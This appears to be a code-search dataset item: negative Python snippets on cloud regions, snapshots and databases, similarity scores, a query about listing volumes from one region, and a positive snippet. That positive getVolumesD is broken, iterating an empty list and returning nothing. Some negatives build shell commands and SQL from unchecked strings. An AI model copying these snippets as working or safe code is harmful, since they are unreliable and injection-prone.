cursor.execute('SELECT * FROM sys.databases')\n studyRegions = []\n for row in cursor:\n if row[0] not in exclusionRows:\n studyRegions.append(row[0])\n studyRegions.sort(key=lambda x: x.lower())\n return studyRegions", "def GetVMSnapshotsList(self):\n try:\n current = self.vmInstance.get_current_snapshot_name()\n snapshots = self.vmInstance.get_snapshots()\n\n if current and snapshots:\n LOGGER.info('Name of current snapshot of virtual machine \"{}\": \"{}\"'.format(VM_NAME, current))\n LOGGER.info('List of all snapshots:')\n\n for i, snap in enumerate(snapshots):\n LOGGER.info(' {}. \"'.format(i + 1) + snap.get_name() + '\"')\n\n else:\n LOGGER.warning('No snapshots found for virtual machine \"{}\"!'.format(VM_NAME))\n\n except Exception as e:\n snapshots = None\n LOGGER.debug(e)\n LOGGER.error(traceback.format_exc())\n LOGGER.error('An error occured while getting list of snapshots of virtual machine \"{}\"!'.format(VM_NAME))\n\n return snapshots", "def getInstancesD(region):\n instances = getInstances(region)\n instancesDicts = {\"id\": i.id,\n \"KEEP-tag\": getKeepTag(i),\n \"instance_type\": i.instance_type,\n \"state\": i.state,\n \"launch_time\": i.launch_time,\n \"security_groups\": getGroups(i),\n \"region\": i.region.name,\n \"PROD\": isProduction(i)\n }", "def regions(self):\n return self._regions", "def get_all_reservations(config):\n reservations = []\n region_list = regions(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for region in region_list:\n _logger.info(\"Searching %s\", region)\n cnx = region.connect(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for reservation in cnx.get_all_instances():\n _logger.info(\"Found %s %s\", reservation,\n [str(i.id) for i in reservation.instances])\n reservations.append(reservation)\n return reservations", "def regions_json(self, filename):\n with open(filename) as f:\n return json.load(f)", "def getStudyRegions(self):\n exclusionRows = ['master', 'tempdb', 'model', 'msdb', 'syHazus', 'CDMS', 'flTmpDB']\n self.cursor.execute('SELECT [StateID] FROM [syHazus].[dbo].[syState]') \n for state in self.cursor:\n exclusionRows.append(state[0])\n query = 'SELECT * FROM sys.databases'\n df = pd.read_sql(query, self.conn)\n studyRegions = df[~df['name'].isin(exclusionRows)]['name']\n studyRegions = studyRegions.reset_index()\n studyRegions = studyRegions.drop('index', axis=1)\n self.studyRegions = studyRegions\n return studyRegions", "def _get_available_regions():\n session = boto3.session.Session()\n\n return session.get_available_regions(service_name='s3')", "def RegionList(self):\n command = \"\"\"\n IPython.notebook.kernel.execute(\"RegionList=\" + JSON.stringify(JS9.GetShapes(\"regions\", {{display: '{wid}JS9'}})));\n \"\"\".format(wid=self.wid)\n get_ipython().run_cell_magic('javascript', '', command)", "def api_get_regions():\n db_session = DBSession()\n\n rows = []\n criteria = '%'\n if request.args and request.args.get('q'):\n criteria += request.args.get('q') + '%'\n else:\n criteria += '%'\n\n regions = db_session.query(Region).filter(Region.name.like(criteria)).order_by(Region.name.asc()).all()\n if len(regions) > 0:\n if request.args.get('show_all'):\n rows.append({'id': 0, 'text': 'ALL'})\n for region in regions:\n rows.append({'id': region.id, 'text': region.name})\n\n return jsonify(**{'data': rows})", "def read_regions(namefile):\n db = shelve.open(namefile)\n key_firms = db['nif']\n regions = db['regions']\n methodvalues = db['methodvalues']\n db.close()\n return key_firms, regions, methodvalues", "def regions(self, member_state):\n rates = self._get_rates(member_state)\n return list(rates.regions.keys())", "def get_regions(self):\n return self._regions", "def region(self):\n return [node.region for node in self]", "def list(self, detailed=True, search_opts=None):\n query_string = utils.build_query_param(search_opts, sort=True)\n\n detail = \"\"\n if detailed:\n detail = \"/detail\"\n\n return self._list(\"/group_snapshots%s%s\" % (detail, query_string),\n \"group_snapshots\")", "def get_snapshot(project, zone, instance):\n snapshot_disks(project, zone, *get_disks(instance))", "def jail_snapshot_list(jnid = ''):\n jname = jnid\n if 'BASE-' in jnid:\n jnid = '/BASE-RW/%s@' % jnid\n else:\n jnid = '/%s@' % jnid\n \n try:\n jsnap = subprocess.check_output(\"zfs list -t snapshot |grep \"+jnid, shell=True)\n except:\n msg = \" ERROR: No zfs snapshots found for '%s'\" % (jnid)\n log(msg)\n return False\n\n jsnap = jsnap.split('\\n')\n jsnapn = []\n for i in jsnap:\n i = i.split(' ')\n while True:\n try:\n i.remove(\"\")\n except ValueError:\n break\n jsnapn.append(i)\n\n lmen = ['Number', \"'%s' current snapshots\" % jname, 'Size']\n del jsnapn[-1]\n jsn = 0\n jsnn = []\n for i in jsnapn:\n jsnn.append([jsn, i[0], i[3]])\n jsn = jsn + 1\n\n return [jsnn, lmen]", "def get_snapshots(\n self, name=None, labels=None, max_results=None, page_token=None):\n labels = labels or {}\n params = {}\n filters = []\n if name:\n filters.append('(name = %s)' % name)\n for key, value in sorted(labels.items()):\n filters.append('(labels.%s = %s)' % (key, value))\n if filters:\n # e.g. (name = snapshot-name) AND (label.version = latest)\n params['filter'] = ' AND '.join(filters)\n if max_results:\n params['maxResults'] = max_results\n if page_token:\n params['pageToken'] = page_token\n return self.call_api('/global/snapshots', params=params)", "def test_snapshot_listing(self):\n page_size = 5\n with mock.patch.object(TDRClient, 'page_size', page_size):\n paged_snapshots = self._public_tdr_client.snapshot_names_by_id()\n snapshots = self._public_tdr_client.snapshot_names_by_id()\n self.assertEqual(snapshots, paged_snapshots)", "def get_instances(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_instances = []\n reservations = conn.get_all_reservations()\n for reservation in reservations:\n for instance in reservation.instances:\n region_instances.append(instance)\n except boto.exception.EC2ResponseError:\n return []\n return region_instances", "def load_snapshot(base_path, snap_num, subvolumes, group, fields, matches):\n n_init = []\n\n snap_key = 'N{}_ThisFile_Redshift'.format('groups' if group == 'Haloprop' else 'subgroups')\n for subvolume in subvolumes: \n n_init.append(load_header(base_path, subvolume)[snap_key][snap_num])\n \n # initialize objects structure\n result = {}\n \n with h5py.File(file_path(base_path, subvolumes[0], 'subvolume'), 'r') as f:\n # galprop and haloprop both have a redshift quantity so we can use that to query for the snapshot we want\n filter_field = '{}Redshift'.format(group)\n \n if not fields:\n fields = list(f[group].keys())\n\n # make sure the redshift field is included in fields\n if filter_field not in fields:\n fields.append(filter_field) \n \n for field in fields:\n if field not in f[group].keys():\n raise Exception(\"Catalog does not have requested field [{}]!\".format(field))\n\n shape = list(f[group][field].shape)\n shape[0] = np.sum(n_init)\n\n # allocate within return dict\n result[field] = np.zeros(shape, dtype=f[group][field].dtype)\n\n if matches:\n with h5py.File(file_path(base_path, subvolumes[0], 'matches'), 'r') as f:\n for field in f[group].keys():\n result[field] = np.zeros(shape, dtype=f[group][field].dtype)\n\n header = load_header(base_path, subvolumes[0])\n filter_condition = header['Redshifts'][snap_num]\n\n offset = 0\n\n for subvolume in subvolumes:\n subvol_result = load_subvolume(base_path, subvolume, group, fields, matches, False)\n\n idx = subvol_result[filter_field][:] == filter_condition\n\n for field in subvol_result.keys():\n if len(subvol_result[field].shape) != 1:\n result[field][offset:offset+n_init[0], :] = subvol_result[field][idx]\n else:\n result[field][offset:offset+n_init[0]] = subvol_result[field][idx]\n\n offset += n_init[0]\n del n_init[0]\n \n return result", "def get_regions(locale):\n\n def json_file(name):\n return os.path.join(json_dir, 'regions', '%s.json' % name)\n\n filepath = json_file(locale)\n\n if not os.path.exists(filepath):\n filepath = json_file('en-US')\n if not os.path.exists(filepath):\n raise Exception('Unable to load region data')\n\n with codecs.open(filepath, encoding='utf8') as fd:\n return json.load(fd)", "def get_workspace_snapshot(self) -> Mapping[str, WorkspaceLocationEntry]:", "def get_snapshots_tree(self):\n\t\treturn Job(SDK.PrlVm_GetSnapshotsTree(self.handle)[0])", "def list_snapshots(self, detailed=True):\n aname = \"cinder_v%s.list_snapshots\" % self.version\n with atomic.ActionTimer(self, aname):\n return (self._get_client()\n .volume_snapshots.list(detailed))", "def data_snapshot(self) -> Dict[str, Any]:\n self.__logger.debug('Eva.data_snapshot called')\n return self.__http_client.data_snapshot()", "def snapshot_metadata(self):\n return self._snapshot_metadata", "def take_snapshot():\n df = scrape()\n for i in df.index:\n single = df.loc[i]\n # create or get locations\n loc, created = Location.objects.get_or_create(\n name=single['Location'],\n all_stands=single['Stands'],\n coordinates=single['Coords']\n )\n # add a new snapshot\n obj = Snapshot(\n location=loc,\n avail_bikes=single['Bikes'],\n free_stands=single['Free stands'],\n timestamp=datetime.now(tz=timezone('Europe/Warsaw'))\n )\n obj.save()", "def get_list(self, regions = None):\r\n \r\n data = []\r\n if regions is None:\r\n regions = ['PHA','STC','JHC','PLK','KVK','ULK','LBK','HKK','PAK','OLK','MSK','JHM','ZLK','VYS']\r\n for region in regions:\r\n cache_file = os.path.join(self.__folder, self.__cache.format(region))\r\n if region in self.__stored_data.keys():\r\n data.append(self.__stored_data[region])\r\n elif os.path.isfile(cache_file):\r\n with gzip.open(cache_file, \"rb\") as file_data:\r\n self.__stored_data[region] = pickle.load(file_data)\r\n data.append(self.__stored_data[region])\r\n else:\r\n parsed_data = self.parse_region_data(region)\r\n with gzip.open(cache_file, \"wb\") as file_data:\r\n pickle.dump(parsed_data, file_data, protocol=-1)\r\n self.__stored_data[region] = parsed_data\r\n data.append(parsed_data)\r\n concatenated_data = []\r\n for j in range(65):\r\n concatenated_data.append(np.concatenate([data[i][1][j] for i in range(len(data))]))\r\n return (data[0][0], concatenated_data)", "def __init__(self):\n self.regions = []", "def getDataBaseLists(data, db):\n # The list of regions - ex: \"46 60 26 23\" for region of coordinates 46.60 26.23\n regions = []\n # The list of lists of records - each region can have multiple records\n records = []\n try:\n # Loop through all data in database dictionary\n for reg, rec in data:\n # Store the region name in list\n regions.append(reg)\n # Create a new list for the current region to store its records\n rec_list = []\n # Loop through records dictionary to get records name and data\n for rec_name, rec_data in rec.items():\n try:\n # Store all records for the current region as Record object\n rec_list.append(Record(rec_name, Data(rec_data)))\n except TypeError as err:\n # Write the exception in logging\n logging.exception(str(err))\n # Something was wrong with the current record - delete it from database\n db.child(Constants.data_path).child(reg).child(rec_name).remove()\n return None, None\n # Store the records list of the current region in the list\n records.append(rec_list)\n return regions, records\n except TypeError as err:\n # Write the exception in logging\n logging.exception(str(err))\n # There was some invalid data in database\n print(Texts.invalid_database_data)\n return None, None", "def region(self):\n return regions.lookup(self.state)", "def list(region, profile):\n ini_data = {}\n environment = {}\n\n if region:\n environment['region'] = region\n else:\n environment['region'] = find_myself()\n\n if profile:\n environment['profile'] = profile\n\n ini_data['environment'] = environment\n if start_list(ini_data):\n sys.exit(0)\n else:\n sys.exit(1)", "def get_exploration_snapshots_metadata(exploration_id, limit):\n exploration = get_exploration_by_id(exploration_id)\n oldest_version = max(exploration.version - limit, 0) + 1\n current_version = exploration.version\n version_nums = range(current_version, oldest_version - 1, -1)\n\n return [exp_models.ExplorationSnapshotModel.get_metadata(\n exploration_id, version_num\n ) for version_num in version_nums]", "def get_region_dict(self):\n if self.initiated is False:\n raise RuntimeError(\"Initiate first\")\n\n return self._region_dict", "def getVCDRPGSnaps(**kwargs):\n strVCDRProdURL = kwargs['strVCDRProdURL']\n sessiontoken = kwargs['sessiontoken']\n if kwargs['cloud_fs_id'] is None:\n print(\"Please specify the ID of the cloud file system using '-cloud-fs-id'\")\n sys.exit(1)\n if kwargs['protection_group_id'] is None:\n print(\"Please specify the ID of the protection group using '-protection-group-id'\")\n sys.exit(1)\n cloud_fs_id = kwargs['cloud_fs_id']\n pg_id = kwargs['protection_group_id']\n if kwargs['protection_group_snap_id'] is None:\n json_response = get_vcdr_pg_snaps_json(strVCDRProdURL, cloud_fs_id, pg_id, sessiontoken)\n if json_response == None:\n print(\"API Error\")\n sys.exit(1)\n snaps = json_response[\"snapshots\"]\n table = PrettyTable(['Snapshot Name', 'Snaphot ID'])\n for i in snaps:\n table.add_row([i['name'], i['id']])\n print(table)\n else:\n snap_id = kwargs['protection_group_snap_id']\n json_response = get_vcdr_pg_snap_details_json(strVCDRProdURL, cloud_fs_id, pg_id, snap_id, sessiontoken)\n if json_response == None:\n print(\"API Error\")\n sys.exit(1)\n create_stamp_int = int(json_response['creation_timestamp'])\n create_stamp = datetime.utcfromtimestamp(create_stamp_int/1e9)\n expire_stamp_int = int(json_response['expiration_timestamp'])\n expire_stamp = datetime.utcfromtimestamp(expire_stamp_int/1e9)\n print(\" \")\n print(f\"Snapshot Name: {json_response['name']}\")\n # print(f\"Snapshot Creation: {json_response['creation_timestamp']}\")\n print(f\"Snapshot Creation: {create_stamp}\")\n print(f\"Snapshot Expiration: {expire_stamp}\")\n print(f\"Snapshot Trigger: {json_response['trigger_type']}\")\n print(f\"Number of VM: {json_response['vm_count']}\")\n print(\" \")", "def get_snapshot(self):\n data = {\n \"t\": self.sim.t,\n \"time\": self.time,\n \"vehicles\": self.sim.vehicles,\n \"stations\": self.sim.stations,\n \"state\": self.state,\n \"done\": self.is_done}\n return copy.deepcopy(data)", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def snapshoted_instances_query(self):\n if self.row_converter.obj.id is None:\n # For new object query should be empty\n return self.mapping_object.query.filter(\n self.mapping_object.id.is_(None))\n rel_snapshots = models.Relationship.get_related_query(\n self.row_converter.obj, models.Snapshot(),\n ).subquery(\"snapshot_rel\")\n case_statement = sqlalchemy.case(\n [\n (\n rel_snapshots.c.destination_type == models.Snapshot.__name__,\n rel_snapshots.c.destination_id,\n ),\n ],\n else_=rel_snapshots.c.source_id,\n )\n snapshot = models.Snapshot.query.filter(\n models.Snapshot.id == case_statement,\n models.Snapshot.child_type == self.mapping_object.__name__,\n ).options(\n load_only(models.Snapshot.child_id)\n ).subquery('snapshots')\n return self.mapping_object.query.filter(\n self.mapping_object.id == snapshot.c.child_id\n )", "def get_db_regions(self, context, regions):\n regions_objs = self.dns_manager.get_db_regions(context, regions)\n return regions_objs", "def describe_snapshots(DirectoryId=None, SnapshotIds=None, NextToken=None, Limit=None):\n pass", "def scope(self) -> List[Region]:\n return [self]", "def list(self, arguments):\n instance_name = arguments['<instance>']\n instance_name = self.activate(instance_name)\n\n vmrun = VMrun(self.vmx, user=self.user, password=self.password)\n print(vmrun.listSnapshots())", "def post_list_snapshots(\n self, response: pubsub.ListSnapshotsResponse\n ) -> pubsub.ListSnapshotsResponse:\n return response", "def _get_orch_db_snapshot_entries(self, scroll_window: int = 1000) -> t.Iterable[SnapshotViewEntry]:\n with self.ch.orch_db_session_scope('ro') as session:\n for obj in session.query(SnapshotViewEntry).yield_per(scroll_window):\n yield obj", "def snapshot_arns(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"snapshot_arns\")", "def test_snapshots(self):\n def get_snapshots(*_args, **_kwargs):\n return {\n 'items': [\n {'selfLink': 'url/snapshot'},\n ],\n }\n self.mock(snapshots.gce.Project, 'get_snapshots', get_snapshots)\n\n key = self.create_entity('project', 'name', ['key:value'])\n expected_urls = ['url/snapshot']\n urls = snapshots.fetch(key)\n self.assertItemsEqual(urls, expected_urls)", "def test_aws_service_api_regions_get(self):\n pass", "def get_region_data(region):\n cursor = reg_data_coll.find({REGION_KEY: region})\n df = pd.DataFrame(list(cursor))\n if df.empty:\n app.logger.error(f\"While getting {region} data: no data\")\n return df", "def getRegions(self, polygon: Polygon, epsg: int) -> list:\n self.output_epsg = epsg\n polygon_df = gpd.GeoDataFrame([polygon], columns=['geometry'])\n\n polygon_df.set_crs(epsg=self.output_epsg, inplace=True)\n polygon_df['geometry'] = polygon_df['geometry'].to_crs(epsg=self.input_epsg)\n minx, miny, maxx, maxy = polygon_df['geometry'][0].bounds\n\n cond_xmin = self.metadata.xmin <= minx\n cond_xmax = self.metadata.xmax >= maxx\n cond_ymin = self.metadata.ymin <= miny\n cond_ymax = self.metadata.ymax >= maxy\n\n df = self.metadata[cond_xmin & cond_xmax & cond_ymin & cond_ymax]\n sort_df = df.sort_values(by=['year'])\n regions = sort_df['filename'].to_list()\n return regions", "def list_regions():\n regions_areas = (\n db.session.query(\n models.Region.code.label(\"region_code\"),\n models.Region.name.label(\"region_name\"),\n db.case([(models.District.code.is_(None),\n db.literal_column(\"'admin_area'\"))],\n else_=db.literal_column(\"'district'\")).label(\"area_type\"),\n db.case([(models.District.code.is_(None), models.AdminArea.code)],\n else_=models.District.code).label(\"area_code\"),\n db.case([(models.District.code.is_(None), models.AdminArea.name)],\n else_=models.District.name).label(\"area_name\")\n ).select_from(models.Region)\n .join(models.Region.areas)\n .outerjoin(models.AdminArea.districts)\n .filter(models.Region.code != \"GB\")\n .order_by(\"region_name\", \"area_name\")\n .all()\n )\n regions = {}\n areas = {}\n for row in regions_areas:\n regions[row.region_code] = row.region_name\n areas.setdefault(row.region_code, []).append(row)\n\n return render_template(\"regions.html\", regions=regions, areas=areas)", "def list_rds(region, filter_by_kwargs):\n conn = boto.rds.connect_to_region(region)\n instances = conn.get_all_dbinstances()\n return lookup(instances, filter_by=filter_by_kwargs)", "def regions(self) -> Sequence[str]:\n return pulumi.get(self, \"regions\")", "def extract_spawn(spoiler_logs, ages):\n spawns = [[log['entrances'][\"Child Spawn -> KF Links House\"], \n log['entrances'][\"Adult Spawn -> Temple of Time\"]] for log in spoiler_logs]\n \n return [[xx['region'] if isinstance(xx, dict) else xx for xx in x] for x in spawns]", "def GetWorldRegions():\n return GetDataFromCsvFile('world_regions.csv')", "def get_new_region_dict(db_name=DB_NAME, lang='en'):\n\n region_dict = {}\n db_dest = 'database/' + db_name\n conn = sqlite3.connect(db_dest)\n cur = conn.cursor()\n\n if lang == 'zh':\n select_col = 'NewNameZh'\n elif lang == 'en':\n select_col = 'NewNameEn'\n else:\n return None\n\n statement = '''\n SELECT DISTINCT NewRegionId, {}\n FROM RegionsOld\n ;'''.format(select_col)\n result = cur.execute(statement)\n result_lst = result.fetchall()\n for (region_id, region_name) in result_lst:\n region_dict[region_id] = region_name\n\n conn.close()\n return region_dict", "def regions(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"regions\")", "def iter_one_regions(self) -> Iterable[Tuple[Region, OneRegionTimeseriesDataset]]:\n for location_id, data_group in self.data_with_fips.groupby(CommonFields.LOCATION_ID):\n latest_dict = self._location_id_latest_dict(location_id)\n yield Region(location_id=location_id, fips=None), OneRegionTimeseriesDataset(\n data_group, latest_dict\n )", "def ListSnapshots(self):\n file_names = sorted(\n [name[:-(len(Archive._SNAP_EXT))] for name in os.listdir(self._path)\n if name.endswith(Archive._SNAP_EXT)])\n timestamps = [datetime.datetime.strptime(x, Archive._TIME_FMT)\n for x in file_names]\n return timestamps", "def region(self, args):\n m = MessageClass()\n print('123124')\n data = {'list': []}\n data['list'].append({\"Region_Name\": \"us-east-1\"})\n data['list'].append({\"Region_Name\": \"us-east-2\"})\n data['list'].append({\"Region_Name\": \"us-west-1\"})\n data['list'].append({\"Region_Name\": \"us-west-2\"})\n data['list'].append({\"Region_Name\": \"ap-northeast-1\"})\n data['list'].append({\"Region_Name\": \"ap-northeast-2\"})\n data['list'].append({\"Region_Name\": \"ap-south-1\"})\n data['list'].append({\"Region_Name\": \"ap-southeast-1\"})\n data['list'].append({\"Region_Name\": \"ap-southeast-1\"})\n data['list'].append({\"Region_Name\": \"ca-central-1\"})\n data['list'].append({\"Region_Name\": \"eu-central-1\"})\n data['list'].append({\"Region_Name\": \"eu-west-1\"})\n data['list'].append({\"Region_Name\": \"eu-west-2\"})\n data['list'].append({\"Region_Name\": \"eu-west-3\"})\n data['list'].append({\"Region_Name\": \"sa-east-1\"})\n m.data = data\n return m.to_json()", "def avail_locations(call=None):\n if call == \"action\":\n raise SaltCloudSystemExit(\n \"The avail_images function must be called with \"\n \"-f or --function, or with the --list-locations option\"\n )\n\n ret = {}\n conn = get_conn()\n\n for item in conn.list_locations()[\"items\"]:\n reg, loc = item[\"id\"].split(\"/\")\n location = {\"id\": item[\"id\"]}\n\n if reg not in ret:\n ret[reg] = {}\n\n ret[reg][loc] = location\n return ret", "def regions(self):\n regions = set()\n for report in self._reports:\n region = report.model.region\n if region is None or region in regions:\n continue\n yield region", "def get_regions(self,online=False):\n clients = HWIOS.pb_server.get_clients()\n regions = []\n for client in clients:\n for service in client.region_services:\n if online: \n if service['status'] == 'ON':\n for region in service['regions']:\n regions.append(region)\n else:\n for region in service['regions']:\n region['status'] = service['status']\n regions.append(region)\n return regions", "def get_recordrange(self):\r\n if self.version >= 10.1:\r\n querystr = \"\"\"?where=&outFields=*&returnGeometry=false&returnIdsOnly=false&returnCountOnly=false&orderByFields=&groupByFieldsForStatistics=&outStatistics=[{%0D%0A++++\"statisticType\"%3A+\"count\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidcount\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"min\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmin\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"max\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmax\"%0D%0A++}]&returnZ=false&returnM=false&returnDistinctValues=false&f=pjson\"\"\"\r\n req = requests.get(self.endpointurl + querystr)\r\n self.recordinfo = req.json()[\"features\"][0][\"attributes\"]\r\n\r\n elif self.version < 10.1:\r\n querystr = \"\"\"?text=&geometry=&geometryType=esriGeometryPoint&inSR=&spatialRel=esriSpatialRelIntersects&relationParam=&objectIds=&where=objectid+>+-1&time=&returnCountOnly=true&returnIdsOnly=false&returnGeometry=false&maxAllowableOffset=&outSR=&outFields=&f=pjson\"\"\"\r\n req = requests.get(self.endpontquerystr + qs)\r\n self.recordinfo = {\"oidmin\": 0, \"oidmax\": req.json()[\"count\"]}\r\n\r\n [\r\n self.iterlist.append([x, x + 999])\r\n for x in range(\r\n self.recordinfo[\"oidmin\"]\r\n if self.recordinfo[\"oidmin\"] != self.recordinfo[\"oidmax\"]\r\n else 1 - self.recordinfo[\"oidmin\"],\r\n self.recordinfo[\"oidmax\"],\r\n 1000,\r\n )\r\n ]", "def list_snapshots(self, account_id=None, max_items=100):\n if not account_id:\n account_id = get_instance_identity_document()['accountId']\n paginator = self.__client.get_paginator('describe_snapshots')\n response = paginator.paginate(OwnerIds=[account_id], PaginationConfig={'MaxItems': max_items}) \\\n .build_full_result()\n\n return EBSSnapshotsList(response)", "def get_regions():\n\n # Also known as the 'climbing directory'\n route_guide = urlopen('https://www.mountainproject.com/route-guide',\n context=ctx)\n # Opens HTML\n region_html = route_guide.read()\n # Parses HTML with BS package\n region_soup = BeautifulSoup(region_html, 'html.parser')\n # Finds regions area of the page\n regions = region_soup.find('div', id='route-guide')\\\n .find_all('div', class_='mb-half')\n\n for region in regions:\n # Link to region area guide\n url = region.find('a')['href']\n # English name of region\n region_name = region.find('a').get_text()\n # Writes region name and url to Areas DB. This gives the region a\n # unique id automatically\n cursor.execute('''\n INSERT INTO Areas(url, name)\n VALUES ('%s', '%s')\n ON CONFLICT DO NOTHING\n ''' % (url, region_name))\n # Commits to DB\n conn.commit()", "def get_trainscript_region_info(transcript_info, region_parent, region):\n if region_parent in transcript_info.keys():\n parent_info = transcript_info[region_parent]\n regions = []\n for r in parent_info:\n if r['object_type'] == region:\n regions.append(r)\n else:\n raise ValueError(region_parent + ' or ' + region + 'element could not be identified')\n return regions", "def regions(self):\n\n class RegionIter(object):\n def __init__(self, region_based):\n self._region_based = region_based\n\n def __len__(self):\n return self._region_based._region_len()\n\n def __iter__(self):\n return self()\n\n def _fix_chromosome(self, regions):\n for r in regions:\n r.fix_chromosome(copy=True)\n\n def __call__(self, key=None, *args, **kwargs):\n fix_chromosome = kwargs.pop('fix_chromosome', False)\n\n if key is None:\n iterator = self._region_based._region_iter(*args, **kwargs)\n else:\n if isinstance(key, string_types) or isinstance(key, GenomicRegion):\n iterator = self._region_based.region_subset(key, *args, **kwargs)\n else:\n iterator = self._region_based._get_regions(key, *args, **kwargs)\n\n if fix_chromosome:\n return self._fix_chromosome(iterator)\n else:\n return iterator\n\n def __getitem__(self, item):\n if isinstance(item, string_types) or isinstance(item, GenomicRegion):\n return self._region_based.region_subset(item)\n return self._region_based._get_regions(item)\n\n return RegionIter(self)" ]
[ "0.71616983", "0.68013346", "0.64756656", "0.6455287", "0.6392508", "0.6385133", "0.63725513", "0.6275416", "0.6235013", "0.62241733", "0.6165991", "0.6158216", "0.6134359", "0.605335", "0.6047018", "0.6043569", "0.6014061", "0.5964335", "0.5959861", "0.59526664", "0.5890748", "0.58749694", "0.58680886", "0.58511454", "0.58156496", "0.58014673", "0.5779456", "0.57731444", "0.5749603", "0.57409245", "0.56691796", "0.56569934", "0.5648708", "0.56472605", "0.5645535", "0.564447", "0.56399554", "0.5637498", "0.56297547", "0.56011677", "0.5598593", "0.55866396", "0.5585515", "0.5554067", "0.554311", "0.5515556", "0.5486095", "0.5458728", "0.5458533", "0.5445661", "0.54317784", "0.5423293", "0.5419014", "0.5408664", "0.5406546", "0.540356", "0.5395099", "0.5386243", "0.5382832", "0.5370286", "0.5368744", "0.53590137", "0.5331733", "0.5318954", "0.53171223", "0.53072006", "0.5304413", "0.52950126", "0.5294772", "0.5288212", "0.5285375", "0.5282921", "0.52693206", "0.52584034", "0.5242879", "0.52418834", "0.5239612", "0.5236293", "0.52323973", "0.52265865", "0.52195215", "0.5218574", "0.52106375", "0.5195438", "0.5192766", "0.51910245", "0.5188639", "0.51874757", "0.51861423", "0.51812404", "0.5179374", "0.51744485", "0.51536024", "0.514945", "0.5145098", "0.5142145", "0.513774", "0.5136975", "0.5132352", "0.5122334" ]
0.78463835
0
return a list of dictionaries representing volumes from one region
def getVolumesD(region): volumes = getVolumes(region) instances = getInstancesD(region) volumesDicts = [] for v in volumesDicts: volumesDict = {"id": v.id, "KEEP-tag": getKeepTag(v), "instance_KEEP-tag": getKeepTag(getInstanceOf(v)), "instance": v.attach_data.instance_id, "status": v.status, "size": v.size, "create-time": v.create_time, "region": v.region.name, "zone": v.zone, "snapshot_id": v.snapshot_id, "PROD": isProduction(v) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_volumes(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_volumes = conn.get_all_volumes()\n except boto.exception.EC2ResponseError:\n return [] # This better not fail silently or I'll cut a person.\n return region_volumes", "def _get_data_volumes(vm_):\n ret = []\n volumes = vm_[\"volumes\"]\n for key, value in volumes.items():\n # Verify the required 'disk_size' property is present in the cloud\n # profile config\n if \"disk_size\" not in volumes[key].keys():\n raise SaltCloudConfigError(\n \"The volume '{}' is missing 'disk_size'\".format(key)\n )\n # Use 'HDD' if no 'disk_type' property is present in cloud profile\n if \"disk_type\" not in volumes[key].keys():\n volumes[key][\"disk_type\"] = \"HDD\"\n\n # Construct volume object and assign to a list.\n volume = Volume(\n name=key,\n size=volumes[key][\"disk_size\"],\n disk_type=volumes[key][\"disk_type\"],\n licence_type=\"OTHER\",\n )\n\n # Set volume availability zone if defined in the cloud profile\n if \"disk_availability_zone\" in volumes[key].keys():\n volume.availability_zone = volumes[key][\"disk_availability_zone\"]\n\n ret.append(volume)\n\n return ret", "def volumes(self) -> dict:\n return self.data[\"volumes\"]", "def volumes(self):", "def show_asm_volumes(self):\n sql = \"select NAME from v$asm_diskgroup_stat ORDER BY 1\"\n self.cur.execute(sql)\n res = self.cur.fetchall()\n key = ['{#ASMVOLUME}']\n lst = []\n for i in res:\n d = dict(zip(key, i))\n lst.append(d)\n print(json.dumps({'data': lst}))", "def get_volumes(self):\n url = self._get_url() + 'volumes'\n volumes = self._request(url)\n return volumes.json()", "def get_volumes_detail(self, **kw):\n return (200, {}, {\"volumes\": [\n {'id': 1234,\n 'name': 'sample-volume for cinder',\n 'attachments': [{'server_id': 12234}]},\n {'id': 'pvcvolume',\n 'name': 'pvc sample-volume for cinder',\n 'attachments': [{'server_id': 54321}]}\n ]})", "def get_volumes(instance):\n if instance.cloud == 'aws':\n client = boto3.session.Session().client('ec2', instance.region)\n devices = client.describe_instance_attribute(\n InstanceId=instance.id, Attribute='blockDeviceMapping').get('BlockDeviceMappings', [])\n volumes = client.describe_volumes(VolumeIds=[device['Ebs']['VolumeId']\n for device in devices if device.get('Ebs', {}).get('VolumeId')]).get('Volumes', [])\n return {volume['Attachments'][0]['Device']: {'size': volume['Size'], 'volume_type': volume['VolumeType']} for volume in volumes}\n if instance.cloud == 'gcp':\n credentials = GoogleCredentials.get_application_default()\n compute = discovery.build('compute', 'v1', credentials=credentials)\n volumes = {}\n for disk in compute.instances().get(instance=instance.id,\n zone=instance.zone,\n project=instance.project).execute()['disks']:\n index = disk['index']\n name = disk['deviceName'] if disk['deviceName'] not in [u'persistent-disk-0', 'boot'] else instance.id\n if 'local-ssd' in disk['deviceName']:\n size = 375.0\n disk_type = 'local-ssd'\n else:\n size = float(disk.get('diskSizeGb', 0.))\n disk_type = 'pd-ssd'\n volumes[index] = {'size': size,\n 'type': disk['type'],\n 'deviceName': disk['deviceName'],\n 'interface': disk['interface'],\n 'diskType': disk_type}\n return volumes\n raise ValueError('Unknown cloud %s' % instance.cloud)", "def database_volume_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.Volume)\n\n volume_objs = list()\n for volume in query.all():\n nfvi_volume_data = json.loads(volume.nfvi_volume_data)\n nfvi_volume = nfvi.objects.v1.Volume(nfvi_volume_data['uuid'],\n nfvi_volume_data['name'],\n nfvi_volume_data['description'],\n 